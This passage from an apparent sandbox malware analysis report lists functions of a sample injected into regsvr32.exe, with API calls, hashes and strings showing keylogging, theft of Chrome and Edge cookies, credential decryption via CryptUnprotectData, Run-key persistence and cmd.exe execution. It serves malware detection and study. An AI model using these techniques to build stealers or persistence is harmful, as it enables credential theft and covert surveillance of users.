                                      • String ID: C:\Windows\SysWOW64\regsvr32.exe$open
                                      • API String ID: 2825088817-258962619
                                      • Opcode ID: 15c41326b4009cc4bf496649b0f96d2f43134bdc5b2854712ef093639a0823ab
                                      • Instruction ID: cc6a99faef55bdbaabd559ce363c431d8efa40e1bbc410af57c3b930a89e0d14
                                      • Opcode Fuzzy Hash: 15c41326b4009cc4bf496649b0f96d2f43134bdc5b2854712ef093639a0823ab
                                      • Instruction Fuzzy Hash: F261E271B8430066DA24FF74AEE5DBE73ABAF80B50F80090EE546571C0EF749909CE92
                                      Function 02A13A55 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 179registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 02A13ABC
                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 02A13AEB
                                      • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 02A13B8B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Enum$InfoQueryValue
                                      • String ID: [regsplt]
                                      • API String ID: 3554306468-4262303796
                                      • Opcode ID: 64ff003d21016030bf83ca0e7d33fc4afcfde995926193ff8372ee72b9cbc4b4
                                      • Instruction ID: 25698c5b5f3ed6646c3a9b58f19ae14f7714c9fcda3fbf858dd33b6138de3a84
                                      • Opcode Fuzzy Hash: 64ff003d21016030bf83ca0e7d33fc4afcfde995926193ff8372ee72b9cbc4b4
                                      • Instruction Fuzzy Hash: FC512E71940219AADB11EB95DDC5EEFB7BEFF14304F5004A6E50AE2190EF706A48CFA1
                                      Function 02A43435 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\SysWOW64\regsvr32.exe,00000104), ref: 02A43475
                                      • _free.LIBCMT ref: 02A43540
                                      • _free.LIBCMT ref: 02A4354A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$FileModuleName
                                      • String ID: C:\Windows\SysWOW64\regsvr32.exe
                                      • API String ID: 2506810119-3922119987
                                      • Opcode ID: 4abc9ac6ce24c049d5f6665512be5c5b26184a7462b914e165d84e388958c680
                                      • Instruction ID: 25fed07448e0aa05849459d9d31a07bfe4b5c3aeade774ca91c3331170db5487
                                      • Opcode Fuzzy Hash: 4abc9ac6ce24c049d5f6665512be5c5b26184a7462b914e165d84e388958c680
                                      • Instruction Fuzzy Hash: 89318C71A40258EFDF22DF999980A9EBBBDEFC5315F2040A6E90497200DF70DA85CB91
                                      Function 02A0C6BB Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 02A0C526: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 02A0C559
                                      • PathFileExistsW.SHLWAPI(00000000), ref: 02A0C6EC
                                      • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 02A0C757
                                      Strings
                                      • User Data\Profile ?\Network\Cookies, xrefs: 02A0C704
                                      • User Data\Default\Network\Cookies, xrefs: 02A0C6D2
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExistsFilePath
                                      • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                      • API String ID: 1174141254-1980882731
                                      • Opcode ID: 154403c7a189bb5d11b98951efd9252fe59e89b535855a7a25ae20b9b89414ee
                                      • Instruction ID: 8cda18a7c221d53241024ad0453cc9009248339d2ab8dcd5fe139d008816ac7a
                                      • Opcode Fuzzy Hash: 154403c7a189bb5d11b98951efd9252fe59e89b535855a7a25ae20b9b89414ee
                                      • Instruction Fuzzy Hash: 72211231D801199ACB05F7A1FDD5CEEBB7AEE50765B40051BE506930D0EF60AA4ACA90
                                      Function 02A0C5EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 02A0C4C3: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 02A0C4F6
                                      • PathFileExistsW.SHLWAPI(00000000), ref: 02A0C61D
                                      • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 02A0C688
                                      Strings
                                      • User Data\Profile ?\Network\Cookies, xrefs: 02A0C635
                                      • User Data\Default\Network\Cookies, xrefs: 02A0C603
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExistsFilePath
                                      • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                      • API String ID: 1174141254-1980882731
                                      • Opcode ID: 7b51e6cb1e973c1c334c82c14261e7fb8d8add47d53a6cc5932e9b789fae5322
                                      • Instruction ID: 853ef3f83877e511248d7ab0f86e1c4a3252fa8faf94c27fe2181b97e917f6cf
                                      • Opcode Fuzzy Hash: 7b51e6cb1e973c1c334c82c14261e7fb8d8add47d53a6cc5932e9b789fae5322
                                      • Instruction Fuzzy Hash: 2F211F31D801199ACB14FBA1FDD5CEEBB3AFE50765F40052BE506A30D0EF609A4ACA90
                                      Function 02A0A179 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateThread.KERNEL32(00000000,00000000,02A0A27D,02A750F0,00000000,00000000), ref: 02A0A1FE
                                      • CreateThread.KERNEL32(00000000,00000000,02A0A267,02A750F0,00000000,00000000), ref: 02A0A20E
                                      • CreateThread.KERNEL32(00000000,00000000,02A0A289,02A750F0,00000000,00000000), ref: 02A0A21A
                                        • Part of subcall function 02A0B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,02A750F0), ref: 02A0B172
                                        • Part of subcall function 02A0B164: wsprintfW.USER32 ref: 02A0B1F3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateThread$LocalTimewsprintf
                                      • String ID: Offline Keylogger Started
                                      • API String ID: 465354869-4114347211
                                      • Opcode ID: 7cbb0a197d2892e4ecb9a7d0a8b8f5810bd9383aae508bf3a3f0d2d21cba559a
                                      • Instruction ID: cd95a42147c53053edc0a99ef102c9ee3370e582530677c96cdacddf7cf3aabf
                                      • Opcode Fuzzy Hash: 7cbb0a197d2892e4ecb9a7d0a8b8f5810bd9383aae508bf3a3f0d2d21cba559a
                                      • Instruction Fuzzy Hash: 3E11CAB12403087EA220BB35ADCACBF775EDE953A8B40096DF947021D5DE615D58CEF2
                                      Function 02A0AEEE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65threadCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 02A0B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,02A750F0), ref: 02A0B172
                                        • Part of subcall function 02A0B164: wsprintfW.USER32 ref: 02A0B1F3
                                        • Part of subcall function 02A1B4EF: GetLocalTime.KERNEL32(00000000), ref: 02A1B509
                                      • CreateThread.KERNEL32(00000000,00000000,02A0A267,?,00000000,00000000), ref: 02A0AF6E
                                      • CreateThread.KERNEL32(00000000,00000000,02A0A289,?,00000000,00000000), ref: 02A0AF7A
                                      • CreateThread.KERNEL32(00000000,00000000,02A0A295,?,00000000,00000000), ref: 02A0AF86
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateThread$LocalTime$wsprintf
                                      • String ID: Online Keylogger Started
                                      • API String ID: 112202259-1258561607
                                      • Opcode ID: 9675ce4c1e2f618d76f5b52a5c30f9f2a4f3a6abc595cf674cbfca542b36bfe2
                                      • Instruction ID: 333a129356feae9cd5f6849044229274b0153b4e696bc5efc999efca8889b181
                                      • Opcode Fuzzy Hash: 9675ce4c1e2f618d76f5b52a5c30f9f2a4f3a6abc595cf674cbfca542b36bfe2
                                      • Instruction Fuzzy Hash: AD0126917803083EF62077356CCAD7F7F2ECA853A8F400469FA4612186DE561C098BF2
                                      Function 02A04F51 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58timethreadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetLocalTime.KERNEL32(?), ref: 02A04F81
                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 02A04FCD
                                      • CreateThread.KERNEL32(00000000,00000000,02A05150,?,00000000,00000000), ref: 02A04FE0
                                      Strings
                                      • KeepAlive | Enabled | Timeout: , xrefs: 02A04F94
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Create$EventLocalThreadTime
                                      • String ID: KeepAlive | Enabled | Timeout:
                                      • API String ID: 2532271599-1507639952
                                      • Opcode ID: 77987b474b36334bbaee438ea286c1c93668b6b58f11dcf0890e738ccb078239
                                      • Instruction ID: 536a7ba765904c77489e7c37f58067cb951a32e529b278c7221310160005489f
                                      • Opcode Fuzzy Hash: 77987b474b36334bbaee438ea286c1c93668b6b58f11dcf0890e738ccb078239
                                      • Instruction Fuzzy Hash: 7111E731C44384AAD720A776A88DEABBFBCABC6710F04040FE54146180CE749445CBB2
                                      Function 02A06A63 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 02A06A82
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A06A89
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: CryptUnprotectData$crypt32
                                      • API String ID: 2574300362-2380590389
                                      • Opcode ID: 6ff5ebb3ddf0764b1f8ea5dffed653960874f81d26051a8266ef97d32dbd9c71
                                      • Instruction ID: e1c2217ddd56e89b7d49660b55c829d654cb977a50f0ea710748b5ebf6f24a59
                                      • Opcode Fuzzy Hash: 6ff5ebb3ddf0764b1f8ea5dffed653960874f81d26051a8266ef97d32dbd9c71
                                      • Instruction Fuzzy Hash: E901F531A00216ABDB18DFAEA8849AFBBBCEB48704F04816DE915D3240DF70D951C7A0
                                      Function 02A0515C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46synchronizationCOMMON
                                      Download Yara Rule
                                      APIs
                                      • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,02A05159), ref: 02A05173
                                      • CloseHandle.KERNEL32(?), ref: 02A051CA
                                      • SetEvent.KERNEL32(?), ref: 02A051D9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseEventHandleObjectSingleWait
                                      • String ID: Connection Timeout
                                      • API String ID: 2055531096-499159329
                                      • Opcode ID: 41945c9003b5e9db44873d7af06dba0c3310c6a431a2b3f510afc926735244df
                                      • Instruction ID: 190c4971fb954cd820d7ba318f9a91ffbdf0066b270b6fe630041e4e16953c82
                                      • Opcode Fuzzy Hash: 41945c9003b5e9db44873d7af06dba0c3310c6a431a2b3f510afc926735244df
                                      • Instruction Fuzzy Hash: 01012430E80B00AFE3257F35A8D542BBBE5FF01301744092DD58386AA0DF209805CF51
                                      Function 02A0E7C5 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                      Download Yara Rule
                                      APIs
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 02A0E833
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Exception@8Throw
                                      • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                      • API String ID: 2005118841-1866435925
                                      • Opcode ID: f62972f35983b644f2466070a8536e15e03f8a154d8a414f562eda8cc239a2e9
                                      • Instruction ID: 8eeb5820da1a40b92477a9be432be3d922ef963b4994c581df3a0c90bb49adc4
                                      • Opcode Fuzzy Hash: f62972f35983b644f2466070a8536e15e03f8a154d8a414f562eda8cc239a2e9
                                      • Instruction Fuzzy Hash: 7701A2705D0308BBF718EB90EFC6FBE7769AB10705F044C49EA16550C0EF617615DA66
                                      Function 02A07260 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40COMMON
                                      Download Yara Rule
                                      Strings
                                      • C:\Windows\SysWOW64\regsvr32.exe, xrefs: 02A076C4
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: C:\Windows\SysWOW64\regsvr32.exe
                                      • API String ID: 0-3922119987
                                      • Opcode ID: 29274ba21d00856ed2c82f865a4589a9d1efae04021464d68e779c1ec412070a
                                      • Instruction ID: 410012b19fa770e43e6bb723961c05345a0c0059a8461ffbf0fb97e28754d5f1
                                      • Opcode Fuzzy Hash: 29274ba21d00856ed2c82f865a4589a9d1efae04021464d68e779c1ec412070a
                                      • Instruction Fuzzy Hash: BEF09070E90351DBCA1467A47E9877A7A5AA781742F800C66E907CA2C0EF749816CA58
                                      Function 02A13814 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegCreateKeyW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?), ref: 02A1381F
                                      • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,?,?,?,?,00000000,02A752D8,6CEC7450,?), ref: 02A1384D
                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,02A752D8,6CEC7450,?,?,?,?,?,02A0CFAA,?,00000000), ref: 02A13858
                                      Strings
                                      • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 02A1381D
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseCreateValue
                                      • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                      • API String ID: 1818849710-1051519024
                                      • Opcode ID: cba41a12e45afdde46c126a9ac872aba6bfe6b40e6c59236e41965a7ba76ee78
                                      • Instruction ID: abc5d3022719097c9fc61aa7df36e078476db09865aadfcd78dd8727a2fd1b3a
                                      • Opcode Fuzzy Hash: cba41a12e45afdde46c126a9ac872aba6bfe6b40e6c59236e41965a7ba76ee78
                                      • Instruction Fuzzy Hash: 37F04971980228FBDF109FA1ED85BEB376CEF04761F104956F9099A150EF329A14DA90
                                      Function 02A0DFA6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                      Download Yara Rule
                                      APIs
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02A0DFB1
                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 02A0DFF0
                                        • Part of subcall function 02A35640: _Yarn.LIBCPMT ref: 02A3565F
                                        • Part of subcall function 02A35640: _Yarn.LIBCPMT ref: 02A35683
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 02A0E016
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                      • String ID: bad locale name
                                      • API String ID: 3628047217-1405518554
                                      • Opcode ID: 1d7dc909ef5f23ac6d6c2e5dec998fa23c8a931dbb7f40c8248c333741fed21d
                                      • Instruction ID: 92347ad238b0823f38f598cdc65d69e5f68da64d781a640cd4cacd0c0563a59e
                                      • Opcode Fuzzy Hash: 1d7dc909ef5f23ac6d6c2e5dec998fa23c8a931dbb7f40c8248c333741fed21d
                                      • Instruction Fuzzy Hash: 03F0A9318806049EC734FB64FE95F9AB7699F11710F504A59AA06624D0DF64B618CE44
                                      Function 02A1376F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,02A6611C), ref: 02A1377E
                                      • RegSetValueExA.ADVAPI32(02A6611C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,02A1CAB1,WallpaperStyle,02A6611C,00000001,02A74EE0,00000000), ref: 02A137A6
                                      • RegCloseKey.ADVAPI32(02A6611C,?,?,02A1CAB1,WallpaperStyle,02A6611C,00000001,02A74EE0,00000000,?,02A0875D,00000001), ref: 02A137B1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseCreateValue
                                      • String ID: Control Panel\Desktop
                                      • API String ID: 1818849710-27424756
                                      • Opcode ID: 527050aa64e5fe5b248f4c1f9813903226ae521415fe1a530d18350dc762058c
                                      • Instruction ID: 114e5503f0a28dcce12461a73728adc79cd3aca8e9df28210cbbf5d19057357f
                                      • Opcode Fuzzy Hash: 527050aa64e5fe5b248f4c1f9813903226ae521415fe1a530d18350dc762058c
                                      • Instruction Fuzzy Hash: B3F0F972980218FBDF00AFA0ED85EEB7B6DEF04750B104956FD09AA150EF329E14DA90
                                      Function 02A160EE Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON
                                      Download Yara Rule
                                      APIs
                                      • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 02A16130
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExecuteShell
                                      • String ID: /C $cmd.exe$open
                                      • API String ID: 587946157-3896048727
                                      • Opcode ID: e89e5fdb0a45c40b5133ec85490bb418df91afe1a25cc3ff0d6706ea107702a1
                                      • Instruction ID: 8f0909ef16c6a0909e7de62b39273eaa35a02d290c75bef7fff93cbbcd3f50c4
                                      • Opcode Fuzzy Hash: e89e5fdb0a45c40b5133ec85490bb418df91afe1a25cc3ff0d6706ea107702a1
                                      • Instruction Fuzzy Hash: F5E0C070688344AAD605E664E9D8CBF73AEBA54754B40081EB147920D0EF649D09CE51
                                      Function 02A014AF Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 02A014B9
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A014C0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: GetLastInputInfo$User32.dll
                                      • API String ID: 2574300362-1519888992
                                      • Opcode ID: c3b9580e49b4f0c04cdc2c8a45f74f76b1d10e2b0c39aa284b451c18302042d5
                                      • Instruction ID: 48b0a3b94562cf83abeda35b4d5136331999fa973ea86372d9d753a1f6a8efdd
                                      • Opcode Fuzzy Hash: c3b9580e49b4f0c04cdc2c8a45f74f76b1d10e2b0c39aa284b451c18302042d5
                                      • Instruction Fuzzy Hash: 47B092B1DC1311FBEB105FB4A80EA2FBBAAB614712B00880BB842D5101CFB080229F96
                                      Function 02A0140A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 02A01414
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A0141B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressHandleModuleProc
                                      • String ID: GetCursorInfo$User32.dll
                                      • API String ID: 1646373207-2714051624
                                      • Opcode ID: 2870f1eca8d5107408f166ddad11655c1d347b8f977fd7d015bf166ccbf71763
                                      • Instruction ID: 95fb7c19f66186e21de557402e720d92b9b186ad20c5d8acac6372bbd413e2d2
                                      • Opcode Fuzzy Hash: 2870f1eca8d5107408f166ddad11655c1d347b8f977fd7d015bf166ccbf71763
                                      • Instruction Fuzzy Hash: 8FB09BB0DC1351EBFB105BF4580F81F7756B5147127004C16B44795100CF708016C655
                                      Function 02A4A004 Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __alldvrm$_strrchr
                                      • String ID:
                                      • API String ID: 1036877536-0
                                      • Opcode ID: 6e4ce0a9cd107544135c8758f381171db584a835852a0c7515be2cd765a07ccf
                                      • Instruction ID: dad1353546a90712ecfd4d4888650379a3cf3792588ae052cef0c0fa8ce679e2
                                      • Opcode Fuzzy Hash: 6e4ce0a9cd107544135c8758f381171db584a835852a0c7515be2cd765a07ccf
                                      • Instruction Fuzzy Hash: 71A17872A803869FD721CF58C8A0BAEFBE5EF95304F24416DD9859B292DF39C941CB50
                                      Function 02A56C1A Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free
                                      • String ID:
                                      • API String ID: 269201875-0
                                      • Opcode ID: f802fb61b7caf1c359d39ef9158ed3196f56a442e576797c277dbf5b51257c2b
                                      • Instruction ID: a0f0e320892be89739f6442ba44ce7f3048d834f2908a924456817bc49000a5a
                                      • Opcode Fuzzy Hash: f802fb61b7caf1c359d39ef9158ed3196f56a442e576797c277dbf5b51257c2b
                                      • Instruction Fuzzy Hash: 73414F32A40624ABDF246BB98D84B7F3BBEDF45B30F944615FD28D6190DF74C4405A62
                                      Function 02A42801 Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a48a5988053c405985a8fa2cdb4b04c229f327dba2cf51ec9c8b27d2fc67c575
                                      • Instruction ID: bf441550ed05be3d724fa5b0dfe09daf17f4db55ea04497558c1ed73902a6977
                                      • Opcode Fuzzy Hash: a48a5988053c405985a8fa2cdb4b04c229f327dba2cf51ec9c8b27d2fc67c575
                                      • Instruction Fuzzy Hash: 9D41D771A40314AFD7249F78CD40B5EBBEAEBC8710F10856AF915DB690DF71D9418B90
                                      Function 02A04CC3 Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,02A74F50), ref: 02A04DB3
                                      • CreateThread.KERNEL32(00000000,00000000,?,02A74EF8,00000000,00000000), ref: 02A04DC7
                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 02A04DD2
                                      • CloseHandle.KERNEL32(?,?,00000000), ref: 02A04DDB
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                      • String ID:
                                      • API String ID: 3360349984-0
                                      • Opcode ID: cbba40bca2c73c7581d65bc9a830191f578bfbe4b06c91763f6a2ca651e1533d
                                      • Instruction ID: 979e96ddf8341bfc3478d7428baeeda7da06ddfb29e9384c8f68ae19db446f42
                                      • Opcode Fuzzy Hash: cbba40bca2c73c7581d65bc9a830191f578bfbe4b06c91763f6a2ca651e1533d
                                      • Instruction Fuzzy Hash: C3418371588301AFC714EB61EED4EBFB7EEAF84350F40091EF996921D0DF249919CA62
                                      Function 02A0C00C Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      • [Cleared browsers logins and cookies.], xrefs: 02A0C0E4
                                      • Cleared browsers logins and cookies., xrefs: 02A0C0F5
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Sleep
                                      • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                      • API String ID: 3472027048-1236744412
                                      • Opcode ID: 6d90015d52386fc58e1bdb1c74d8c2d152b0892293eea41f2fb1241984de9077
                                      • Instruction ID: 6d1098ff96e44b746006e252fe160d2bf181b0269ac4abead89411e1eabce276
                                      • Opcode Fuzzy Hash: 6d90015d52386fc58e1bdb1c74d8c2d152b0892293eea41f2fb1241984de9077
                                      • Instruction Fuzzy Hash: 4031C8046C83C06EEA116FB475D5BAB7F834E93768F484A5EADC50B2C2CF524409CB63
                                      Function 02A493AD Relevance: 6.1, APIs: 4, Instructions: 90timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 02A493BD
